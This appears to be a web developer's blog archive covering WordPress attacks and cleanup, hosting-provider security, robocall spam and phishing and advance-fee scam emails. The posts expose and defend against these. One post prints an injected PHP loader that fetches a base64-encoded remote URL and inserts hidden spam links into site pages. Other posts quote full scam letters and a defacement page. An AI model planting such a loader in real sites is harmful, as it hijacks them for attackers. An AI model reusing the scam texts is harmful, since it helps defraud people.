to hacking and hackers target the open URLs of the system such as wp-admin
and wp-login and other common files, your site is always under the risk of
attack. To overcome this, you will need to takeaway all the traces of a
standard wordpress site, so no attacks/hacking will work on your site. For
anybody viewing the “source”, all they will see is nice and clean HTML and
no traces of wordpress.

I am sure you understand the concerns I have raised, and I can fix these
for you for a very modest fee if you wish. Please let me know.

Thank You and Regards,

Fahad Hassen
Senior PHP Developer
+1 727 474 1044

Clickingz Security Research Lab, Clearwater FL. 33760

Siktim Ebeniii/Hacked By NmDumuT WordPress Hack… Jumpline Etc

By googling the code, I was able to find many other sites with the same problem (below)…
The vast majority of these are on servers at either

Jumpline resides at myhostcenter.com, as far as I can tell.  Perhaps they are a reseller or something.


This is malware.
And from what I can tell, what it is attempting to do is this:
or this

If you google “Siktim Ebeniii,” you’ll find a bunch of other sites that have been hacked this way.

Usually, these kinds of attacks happen as a result of not having up-to-date software.  But they also happen because of unsafe server settings and since most of these compromised sites seem to be related to myhostcenter.com, I think the latter is a reasonable suspicion. This happened a few years back with a hosting provider called “Network Solutions” and in fact, Godaddy was attacked pretty hard recently, if I recall correctly.

Craigslist Ad Voicemail Spam Robots-OnceDriven.com

The Evil Robots are Calling! A new form of spam.
Robots are scanning Craigslist for phone numbers and leaving voicemails that are based merely on the generic category of the craigslist ad.  In this case, it’s the automotive sales section, although I’m not selling a car.  But notice the voicemail is as if I am.  No one read my ad.  As with blog comment spam, if there’s n mention of anything specific to your actual ad, it’s probably a robot.

Here’s the message: voicemail.mp3

Actual Message Transcript:

Hi, My name is Michael and I work for Once Driven. The number here is (855) 844-2646. Uhh, we’ve got some clients who are shopping for vehicles, and I’m going through a list of vehicles like yours. I’d like to find out more about it and, um,  tell you little bit more about what we can do to help you get it sold. Uh, there’s a small fee for the service. It’s well worth it. I’ll tell you about it when you call. We do guarantee the results. So give me a call before 5 today. Uh, the number is (855) 844-2646. Have a great day.

In my opinion, we should penalize companies for using this technique for marketing purposes for two reasons

  1. It’s against the craigslist’s code of conduct

  2. It’s simply annoying.

So to oncedriven.com, you guys suck for spamming me when you have nothing to offer me and my ad says it’s NOT OK to contact me with other services.  I hope this post effects your SEO and public images in the way you have earned!

Google Voice’s Transcipt (for fun):

Hi, My name is Michael and I work for one street in the number here is (855) 844-2646 we’ve got some clients were shopping for a vehicles. And I’m going through a list of vehicles like yours. I’d like to find out more about it and tell you little bit more about what we can do to help you get it sold. There’s a small piece of the service It’s well worth it. I’ll tell you about it when you call and wedo guarantee the results. So give me a call before 5 today. The number is (855) 844-2646. Have a great day.

UPDATE: I wrote OnceDriven via their website to tell them that I was getting around 100 hits per day to this post  (now it’s more like 200).  This is what they wrote back, followed by my response.

On Jul 9, 2013, at 2:46 PM, Once Driven Management wrote:


Thank you for bringing your thread to our attention. If we may, we’d like to take this opportunity to clarify several of the concerns raised in your thread.

With respect to the calls themselves, OnceDriven receives hundreds of requests from buyers every week. Our representatives attempt to locate vehicles similar to those buyers ask us to find. We were concerned that some people saw this as a form of harassment. As opposed to random marketers trolling online classifieds, we zero in on a unique opportunity to bring buyers and sellers together. While there is some margin for human error, it was disconcerting to see that some people were contacted who were not actually in the vehicle selling market – these must have been administrative errors and we are working diligently with our representatives to bring that number down to zero.

We want to point out that OnceDriven accepts consumers’ requests not to be contacted again. As some of the people in your thread expressed difficulty in contacting us, we’d like to clarify the process. Contrary to one poster’s comments, you do not need a representative’s extension. While you can always contact our toll free number, we have decided to take this one step further as some people have experienced delays being placed on hold. We’re providing a link at the end of this response for people who do not wish to be contacted to enter their number and/or email and notify us of any concerns they may have. If you would be so kind as to bring this to people’s attention by placing it prominently on your thread, we would be very grateful.

Here is the link:


We noticed some comments from people regarding the excessive volume of calls. We are aware of numerous legitimate and illegitimate third parties reaching out to online posters as they contact our very own customers. It is likely some of those calls are being mistakenly attributed to us.

Thank you for giving us an opportunity to respond to your thread.

Stephen Cooper
Management Team

So this is what I wrote back:


Why would your company have contacted me about my “vehicle” when I wasn’t selling one? I was selling a pair of motorcycle saddlebags. And every time I reposted the ad, I would receive at least one call from OnceDriven. It always referred to my “vehicle.”

Shouldn’t it be pretty clear to me that you guys are merely indiscriminately screen-scraping phone numbers from the auto sales part of craigslist and robo-dialing them?

Is that NOT what you’re doing?


I’ll update this post if they respond to my questions.

April 2013 – Some News Concerning Malware Attacks on WordPress Sites

First off, Here’s Matt Mullenweg‘s blurb about the recent botnet attacks on WordPress sites.  It’s good to listen to him because he’s the “founding developer” of WordPress, and the President of the company Automatic which is behind wordpress.com, among other things.


From Matt:

supposedly this botnet has over 90,000 IP addresses, so an IP limiting or login throttling plugin isn’t going to be great (they could try from a different IP a second for 24 hours)

I’ve been noticing a few popular shared hosting providers have been having infrastructure problems lately.  I thought it was a coincidence, but after attempting to do some work on a client’s site hosted at Fatcow (not my favorite host, but they’re OK), I got hip to the fact there is actually a bit of internet-wide drama going on at the moment with WordPress sites getting hacked, or at least many attempts at this.

Here’s a message Fatcow sent out to its customers.

Important Information about Protecting Your WordPress Site

Dear [customer’s name],

Do you have a WordPress account with us? If so, we wanted to let you know about an attack on WordPress sites that started earlier this week, what we’ve done to combat it, and what you can do to protect yourself.

On Tuesday, a widespread “brute force” attack against WordPress started impacting sites across the internet. This attack is leveraging a botnet, which looks to have more than one hundred thousand different computers at its disposal. Its intent is very simple: to find and compromise WordPress sites with simple passwords, likely to use them later to distribute malware (and further increase the size of the botnet).

Over the past few days, we’ve made a number of changes to our network and infrastructure designed to mitigate the impact of this attack on our customers’ websites. Continue reading for a detailed account of what we’ve done »

Also, and we can’t stress this enough, we urge you to check your WordPress password and make sure it’s a strong one. The strong password guidelines in our Knowledgebase refer to your FatCow account password, but that advice is good for WordPress passwords, too!

We head into the weekend in good shape, but vigilant against a returning or altered attack. For those of you who have been impacted by these attacks, or our attempts to combat them, we do apologize for any service disruption. We also apologize for a longer-than-normal response time over the last few days while we’ve had “all hands on deck” addressing this issue. We appreciate your patience and understanding.


The FatCow Team

Bottom Line: Harden your WordPress site a little.

  • Keep your WordPress Core software and plugins and themes up to date!
  • Use Capitals, Lowercase, Numbers and Symbols in your passwords… Avoid guessable/dictionary words
  • If you have a user called “Admin” or “admin,” take a moment to get rid of it.
  • If installing from scratch, modify your database table prefix in wp-config.php to something other than “wp_”
  • Never use any theme, plugin or hosting provider that forces you into leaving folder and file permissions set to be permanently extra lenient (if someone tells you to change a directory to 777, they don’t know what they’re doing or your hosting provider’s server settings are wack…)
  • Stay on top of comment moderation.  If you find yourself with thousands of unmoderated comments waiting for approval, and you don’t want to do the work, perhaps you’re not cut out for participating in that way with the masses, or you just don’t have the time.  Just turn comments off!

There are TONS of free plugins that can help you scrutinize your WordPress install.  I use this from time to time: WP Security Scan.

How To Remove Antimalware Go for free

OK.  If you’re reading this you’re probably pretty frustrated already so let me offer my condolences and say that you’re probably really close to being out of the woods now that you’re here.  I just successfully removed this little bugger from an Windows XP machine, and it only took about 15 minutes.

I found several sites explaining how to manually remove this malware by editing the windows registry but I intend to make the instructions a little more clear so you can do this with a little more confidence.

And keep in mind, if you’re not dealing with XP, my instructions might not work exactly.  But you can probably apply my clarification to the popular instructions to whatever iteration of those instructions you need to work with.

Here are the popular instructions (in this case from removeit.info), but please keep reading before trying to follow them.

Remove AntiMalware GO files and folders:

Remove AntiMalware GO registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “[random].exe”
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter “Enabled” = “0?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings “ProxyOverride” = “”

Clarifications and Precautions:

  1. You can screw things up by making a mistake editing your registry, but you can minimize the risk by making a backup of the registry first.  Google it.  Sorry, I can’t make a tutorial on this, partly because I’m writing this on a Mac.
  2. There are no files that actually say “[random]”.  What they say is something like “vhrdtmn1d” …In other words, in each of these steps, you’re looking for a registry entry or file that has a random string of characters.

Hosting Providers: Check Yourself – WordPress is Mainstream

When I get asked for help with an attack on a WordPress site, it’s often on the same few hosting providers.  And when it’s not, it’s usually a small, local hosting provider.  When I have spoken to the staff of one of these hosting providers, about what seems to only occur in these few situations, they never take responsibility for having oddball server settings. And it’s not uncommon for them to actually blame their customers for using WordPress in the first place!

Some of the more popular Hosting Providers that seem to have more trouble than others with WordPress malware attacks in the past two years (in my experience) are Network Solutions and IX Web Hosting. And in general, hosting providers that have a lot of issues with malware affecting WordPress sites either

  • Have screwy server settings that tempt developers to take risks with file permissions, or
  • Have vulnerabilities that allow malware to sneak from one hosting account to another

As for some of the local, ma ‘n’ pa providers I’ve had problems with, I’m not going to hit them when they’re down by naming names.  But let me just say this: Buying local isn’t necessarily a good idea when it comes to hosting. It’s often the worst thing you can do.  You usually get crappy support, a high price, a non-standard product, and to make things even worse, you also often get a territorial ‘server guy’ who wants to blame any technical problems on the customer and not take responsibility for anything.

I can imagine being a hosting provider and not wanting to change how I do things just because a few of my customers want to run some weird PHP software they found somewhere.  But WordPress is hardly obscure anymore. And although I could be wrong, it seems that the server settings required for a smooth, safe ride with WordPress are in line with “best practices” for hosting providers in general, since all the best and most popular hosting providers seem to run WordPress perfectly.

So in the ‘news,’ I guess on April 12th, 2010, someone (rshinsec) at Network Solutions announced that an attack on many of Network Solutions’ customers’ sites was actually caused by a “WordPress Vulnerability.” (Quote is actually from a WordPress.org page HERE, because according to the WordPress.org page, Network Solutions has since edited the announcement)”

“Beginning last week a WordPress vulnerability has been the target of attacks on multiple WordPress websites on hosting platforms around the web. We have a blog post with additional details about the vulnerability and how to secure your WordPress site.”

In fact, it was not a WordPress problem at all.  So in response to some of the inaccurate anti-worpress blogosphere chatter caused by Network Solutions passing the buck like this, Matt Mullenweg, founder of WordPress posted to the WordPress Development Blog, clearing some things up, as well as putting it like this:

“Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.”

Thank you Matt!  We the people that use and love WordPress need to stand up for ourselves and demand what we deserve.  We are not a fringe community anymore.  WordPress is mainstream software and any hosting provider that has issues with it needs to check themselves!

wordpress attack inserts movie links in content

One of my favorite clients’ sites running WordPress was recently attacked by a bug that inserts links to “movie downloads” and “DVDs” all over the place in her content with “display:hidden”

The site links to sites who are also under attack and when the bug is running correctly on those sites, the sites redirect the hits to the final destination,

which is http://www.zml.com/

I don’t know if zml.com knows this is happening.  I mean I suppose it’s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it.  I’m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.

The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.

The following is a list of the sites being linked thru, which I assume are all victims of this malware.  If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.

  • http://blog.segd.org
  • http://www.investorsunited.com
  • http://www.oca-gla.org
  • http://www.thunderstruck.org
  • http://subway.com
  • http://verdadeabsoluta.net
  • http://yourrnc.com
  • http://wordpressthemesbox.com
  • http://mp3db.org
  • http://webconsultingdc.com
  • http://turtlesurvival.org
  • http://turtleconservationfund.org
  • http://truenorthbrass.com
  • http://tarabooks.com
  • http://kolenalaila.com
  • http://techbostonacademy.org
  • http://pie-flex.com
  • http://www.philebrity.tv
  • http://www.landmarkwine.com
  • http://artsinbushwick.org
  • http://brettmartin.org
  • http://bsf.org
  • http://www.popandpolitics.com
  • http://womanhonorthyself.com
  • http://www.brainstorm9.com
  • http://webdev.entheosweb.com
  • http://www.topicus-healthcare.com
  • http://www.vfilings.com
  • http://constantinessword.com
  • http://www.dopiska.com
  • http://writingcenters.org
  • http://www.radisson.com
  • http://notjustaprettyface.org
  • http://www.arizonacriminaldefenseblog.com
  • http://www.sembrarpaz.com
  • http://www.apostilla.com
  • http://www.geektechs.net
  • http://johnquiggin.com
  • http://blog.pdma.org
  • http://bluesheaven.com

Message to ZML:


I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content. Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.

You look like you’ve built a pretty nice site here. And I’m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.

It doesn’t seem like you would want to be resposible for malware. But it also doesn’t seem like anyone would go through the trouble to make all these links back to you unless you were paying them. Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics? Please write back soon as I have very little patience for this kind of thing.


Andrew A. Peterson

<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>

Some samples of weird code that the bot inserted:

<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>

<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>

wp_remote_fopen WordPress Attack Makes Site SLOW

Thanks to SomewwhereVille for helping me diagnose… Here’s what I removed from header.php (in all the installed themes, not just the active one):


<?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3Mv’; $opt_id=’62f751b6518fcbe2ab5980b9f1349902′; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr[‘hide_text’]!=” && sizeof($blarr[‘links’])>0){ if($blarr[‘random’]){ $new=”; foreach(array_rand($blarr[‘links’],sizeof($blarr[‘links’])) as $k) $new[$k]=$blarr[‘links’][$k]; $blarr[‘links’]=$new; } $txt_out=”; foreach($blarr[‘links’] as $k=>$v) $txt_out.='<a href=”‘.$v.'”>’.$k.'</a>’; echo str_replace(‘[LINKS]’,$txt_out,$blarr[‘hide_text’]); } /* wp_remote_fopen procedure */ ?>

After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks.  For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”

Who knew that was the thing to do?  I didn’t.  It also scans your WP install for risky file permissions and weak passwords and a few other things.


Unfortunately for me, I was working on a site hosted by AN Hosting which doesn’t allow a certain priviledges to DataBase users (Alter?), so I had to change our table prefixes manually.


WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually


Basically you:

  1. download your database thru PHPMyAdmin as per WordPress.org’s Documentation
  2. do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_” 
  3. make a new database and import your “somethingelse_” version to the new database.
  4. Change your wp-config.php file to point at the new database 
  5. Change your wp-config.php file’s “table prefix” line from “$table_prefix  = ‘wp_’ ” to “$table_prefix  = ‘somethingelse_’

These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.

“Hacked By GUARD_FB” WordPress Dashboard Attack

This attack on older versions of WordPress installs a file called index.html in the wp-admin directory so that when a user logs into their dashboard, the browser loads it rather than the index.php file that comes with WordPress.  The result is when trying to access the WordPress Dashboard, instead you get a page which says “Hacked By Guard_FB” followed by a graphic of a silhouette of a man with his with his fist in the air which reads “THE TURK PROTEST…”


Appears in place of the Dashboard in WordPress
Appears in place of the Dashboard in WordPress



The page then goes on with some left wing political stuff, and claims to be affiliated with a site called ateskes.org and is signed “King Defacer”

I’d rather see hacking going on for the sake of activism than for worthless spam, but this thing sucks. The blog on which I encountered this was not particularly political and so I suspect that the makers of this attack aren’t picking and choosing who they attack, which makes it evil crap.   

Bottom line, keep WordPress up to date, stay on top of your comment moderation, and use WordPress’ Cookie-Encryption “Security Keys” feature in your wp-config file.

If this has happened to you, I recommend deleting your spam/comments in moderation (if there’s too many, check here), upgrading WordPress, then changing your Dashboard passwords. Of course, also delete the file called index.html in your wordpress directory’s wp-admin folder.

Full text of “Hacked By Guard_FB” Dashboard page is as follows:


Hacked By GUARD_FB



We Accuse:

  • G.W. Bush, T. Blair, and E. Olmert, the chief executives of the imperialist, colonialist, belligerent policies and actions of the US-British-Israeli coalition,
  • of perpetrating the composite crimes of war of annihilation, occupation, and the premeditated mass murder of children and civilians in Palestine and Lebanon,
  • following their atrocities in Afghanistan and Iraq and foreboding the same in Syria and Iran,
  • sinking into utter barbarity in transgression of all universal norms of human morality.

The Following Are Also Responsible:

  • All government employees and agents, advisors, civil and military functionaries who partake in collective and individual responsibility in these states;
  • the legislative and judicial branches that have not curbed the criminal activities of their governments as they violate basic human rights, most significantly the right to live, and as they trample international legal norms and commit crimes against humanity;
  • universities, media, intellectuals, workers and citizens who do not restrain and sanction their governments through domestic democratic channels;
  • UNITED NATIONS and other national and international bodies that actively or passively support, aid and abet this illegality, crude force, and aggression –all bear responsibility for the catastrophe that is taking place.

We Demand:

  • An immediate cessation of this horror,
  • the due trial, in international tribunals, as well as in the courts of conscience and history,
  • of, above all, Bush, Blair, and Olmert as perpetrators of crimes against humanity,
  • of their respective government agents and supporters,
  • of the chief executives and state personnel in all countries that have been accomplices to these crimes against humanity,
  • and their removal from office by the lawful and democratic initiatives of their respective citizenry.

And We Declare:

  • We stand at a critical juncture in human history.

  • These aggressive, colonialist, exploitative, and militarist practices are negating the achievements of humanity, destroying the basic pillars of international law, and thus, threatening the present and the future of this planet.

  • We refuse to submit to this brutal force and be accomplices to its crimes.

  • We refuse to give in to the (il)logic of blood-fed economies and lethal war machines.

  • We declare that we will continue to struggle for a different world.



King Defacer


WordPress Blog Deleted/Archived for TOS Violation

If your blog has been deleted suddenly by WordPress.com, DON’T PANIC!  …that is, unless you use your blog for phishing scams or spam-commenting or anything else that brings down the experience of other people on the Web and/or makes it harder for people to find the information they need.  In that case, panic.  Scream and cry.  I hope your blog is permanently deleted, and everything you eat for the rest of you life tastes horrible. The Web is our garden!  

Assuming you are an ethical participant of The Cloud, pretty soon you should get an email from WordPress.com explaining the nature of the take-down.

[Anyway, my blog is back, obviously.  I guess I need to start backing up my blog? Jeeez.  What a hassle.]

[begin story]

I regularly blog about scams/spam on the Web.  It’s a way for me be discovered by, and to provide guidance to, people who happen to be googling around about some questionable content they find or are emailed.

One example of this is this search result for “paypal-cgi.com,” a site that mimics PayPal in order to trick people into handing over their paypal login info.  I come up number one for the search, and the title of the result makes it clear that you shouln’t trust PayPal-CGI.com… If you click thru to my post, I explain why these things exist and how to detect this kind of crap.

You see, I’m actually doing something good here.  And it’s good for me too.

Anyway, recently I encountered some scam crap on craigslist and blogged about it. And since my blog post contained a link to the spam/scam site I was exposing, WordPress.com’s evil-detectors went ape shit and my blog got automatically removed by wordpress.com.  

I was in the middle editing a post and suddenly my category selection buttons stopped working.  And there was a thing saying somethin like “you do not have permission to edit this..” or something like that.  When I refreshed the page, I got “The authors have deleted this blog. The content is no longer available”

…and my blog had been completely removed leaving only this scary screen saying: “This blog has been archived or suspended for a violation of our Terms of Service.”

Ironic. I got banned for merely exposing something malicious.

Current Spam-Filter technology isn’t context-aware. This is a slippery slope: Using words or links alone, without regard to context, to define what is untrustworthy content.

See the post in question for yourself HERE

Fortunately, about an hour later, I got a message from WordPress.com: 

from: Anthony – WordPress.com:


Your blog was automatically flagged, as links to overnightcashexplosion.com were detected (and these are certainly not permitted). The blog is back – please remove all such links.



Automattic | WordPress.com

I responded with:

if it’s a url in text, is that different in the eyes of your spam defenses from an actual link?  I’d like to leave the url if possible so I can still come up in searches for that url. 

WHat’s your take on that?

Thanks for communicating with me. :)


Anthony from WordPress replied:

Sure, you can leave it – I understand the context.

Automattic | WordPress.com

So, there is a layer of discretion here?  That’s good I guess.

Spam Emails and URLs

Here in one post, I will start collecting curious little spam messages and emails I get.  These aren’t interesting enough to get their own posts, but I still like to be found in searches for their emails, urls etc.    

MySpace Spam (mariebashor@gmail.com and myspace.com/269092691):
Hi sweetie!      

I’d like to avoid any confusion, I’m writing this on behalf of my mother. She was searching for guys online and came upon your irresistible profile (her words). She’s single and HOT! She wants to experience new things, meet a great guy for dating and more! She’s very alluring, men turn around when she walks? she has very nice curves. She likes going to the movies, drinking coffee and enjoys smart conversation. She plays a few musical instruments but prefers the cello. She’s humorous, romantic and easy-going. I’d like to add that she’s a very perceptive and spiritual person. I hope you’ll write back, you sure won’t regret it. FYI, this is MY account, so don..t reply directly to this message Instead, please use her email address, MarieBashor at gmail..

Well thank you very much


Via Email From tonybenson02@yahoo.com.hk

You can now email me at: sgttonybenson002@yahoo.com

– Dear Friend, I know you would be surprised to read from someone relatively unknown to you before now. My name is Tony Benson, a master sgt. of The U.S. Marine, deployed to Iraq in the beginning of the war in 2003.I would like to share some highly personal classified information about my personal experience and role which I played in the pursuit of my career serving under the U.S ARMY which was at the fore-front of the war in Iraq. Though, I would like to hold back certai n information for security reasons for now until you have found time to visit the BBC website stated below to enable you have insight regarding what I intend to share with you, believing that it would be of your desired interest in one way or the other.Here is a BBC news listing that confirms what I share with you.http://news.bbc.co.uk/2/hi/middle_east/2988455.stm Also, could you get back to me having visited the above website to enable us discuss in a more vivid manner to the best of your understanding. I must say that I’m very uncomfortable sending this message to you without knowing truly if you would misconstrue the importance and decide to go public.In this regards,I will not hold backto say that the essence of this letter is strictly for mutual benefit of you and I and nothing more.I will be more vivid and coherent in my next email in this regards. Meanwhile,could you send me a mail confirming you have visited the site and understood my intentions?Standing by for you r response. warm regards, master sgt.Tony Benson secured email:tonybenson02@yahoo.com.hk


From MySpace

is it u there?:

http://ofthehub. com/go/ms. php?ch=cb8c411a8037611c46a0b5fba697c260 

(ofthehub.com appears to be a virus thing)



I keep getting this email from “Solomon Guei solo.guei1@gmail.com in an email asking me to open an attachment: 


the attachment reads:

From: Solomon Kone Guei          

I am Solomon Kone Guei from Coted Ivoire. I am 26 years old; I lost my father a couple of years ago. My father late General Robert Guei was a Ex-Military head of State of Ivory Coast until his untimely death,(You can visit http://news.bbc.co.uk/2/hi/africa/2269238.stm for complete report on this incident).

He was assassinated on the 19th of September 2002 by an unknown group of heavily armed gunmen following the political uprising. To be brief and straight to the point, before his untimely death, he deposited with a finance security company a metal safe box containing

the sum of (Twenty Million United States Dollars Only) $20 million meant for the purchase of heavy artilleries, armored tank, ammunitions and security equipments.

The security company do not know the real contents of the metal safe box is money, because he convincingly told them at the time of deposit that it only contains African Artefact treasures and computer security consumables that does not need air and sun rays, that

will be ship to his foreign business associate in abroad. 

I want you to do me a favor to claim the box as my late father foreign business associate overseas in your country, so that I will come over to your country for investment and resettlement, since the present administration is no more in cordial relationship with my families. 

I will go into partnership investment with you in your country, such as Real Estate and Hotel ownership this is my reason for writing to you. Please if you are willing to assist me, indicate your interest in replying soonest, I will offer you 30% only for your kind and honest assistance. Do kindly send me your direct telephone and fax numbers for an easy communication-mail me:


Mr. Solomon Guei

Blank Screen of Death WordPress Nefarious Invisible Plugin

Recently while troubleshooting an old WordPress 2.1.3 blog, I found that when trying publish a new post, the next page would fail to load and only get to a blank screen.  Also, while looking around in the dashboard, I noticed that the default upload directory (for uploading images etc), was set to:


from  CyberInsecure.com :

Wordress blogs are mass scanned and attacked, and a new directory in wp-content folder is created in vulnerable ones. The directory is usually called /1/ and its full of html files containing Javascript redirects in them (doorways). There was also an infected blog with phishing pages for Google logins. Google cache already shows thousands of results with such hacked WordPress blogs. They can be seen best by committing a search inurl:wp-content/1/ (do not visit those results, your PC might get infected). Google has already tagged some of these spam pages as harmful.

The blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation. It seems there are also spam comments in posts as well. Spam comments are pointing to internal infected blog pages in folder “1? to get them spidered and to get people to visit them.

This issue was reported to WordPress.org, and there is an unofficial fix for this issue. The fix is based around renaming the cookies used by WordPress by default. If the exploit is hacking the cookies by mass scanning blogs, and it looks for a specific cookie name, that would stop what is out there now but it would not fix the issue.

Recommendations: Upgrade to 2.3.3 along with immediately changing any administrator passwords. Currently older WordPress versions, especially Wordress 2.1.3, attacked using “admin-ajax.php” sql injection exploit to retrieve the administrator account’s password.
Change default cookie names in your blog.

Things like this are a reason to keep your WordPress, and all other software up to date!



Emailinglist Spam A Sad Example

I just glanced at my DataPortability email digest and apparently they got some sexy girls hot sexy pictures and nude videos going on in there.   WTF?


Is that Portable Data?

We are constantly trying to come up with new ways to battle those entities whom have absolutely nothing to contribute.  

In the coming age of more intelligent computing, within the cloud of service providers and throughout the Web Of Data or Semantic Web, will the penetration of irrelevant solicitors be the same?  

Surely there will always be Spam, but will structured data and the services that utilize it help to make barriers, at least of relevance? Or at all?  

Just some shit to think about.

Craigslist Spam -Collecting Emails or What? Hate These Bastards!

from: nade05@uku.co.uk

reply to: johnram555@gmail.com



Please I’ll like to know if your ITEM is

still available. I want to buy it for my wife

as a Britday gift.Email me or call me as

soon as you can so that we can proceed

because I’ll be leaving town in few days



Phone: (915)-808-3485

They don’t say what the item is or ask any questions about it.  The telephone number is a Texas Area Code and is disconnected. I suspect this is a spam-bot that responds to all craigslist ads of a certain parameter, and then collects the email addresses of the people that respond.  Or something like that.  I hate this.